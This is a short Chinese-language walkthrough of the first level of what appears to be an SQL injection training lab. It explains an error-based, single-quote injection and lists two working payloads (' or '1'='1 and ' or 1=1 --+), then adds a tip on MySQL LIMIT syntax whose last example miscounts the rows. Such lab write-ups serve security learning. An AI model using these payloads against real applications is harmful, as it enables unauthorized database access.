Less-1:GET-Error based-Single quotes-String
第一节:GET – 基于错误 – 单引号 – 字符型
这里提示:输入一个数值型的“id”作为参数
比如使用:
?id=1加入到url后面,变成->localhost/Less-1/?id=1
可正常查询到一条记录:
根据源码,index.php第29行,可以知道这里使用的查询语句为:
SELECT * FROM users WHERE id='$id' LIMIT 0,1这里$id是被单引号包裹的。
使用id=1'进行查询验证,得到报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
所以以下两个注入可以测试成功:
' or '1'='1
' or 1=1 --+
会自动返回第一条数据
tips:
查询语句中limit的意思是:
(格式:limit 第几条,一共几条)
select * from tablename limit 0,1即取出第一条记录
select * from tablename limit 1,1第二条记录
select * from tablename limit 10,20从第11条到31条(共计20条)
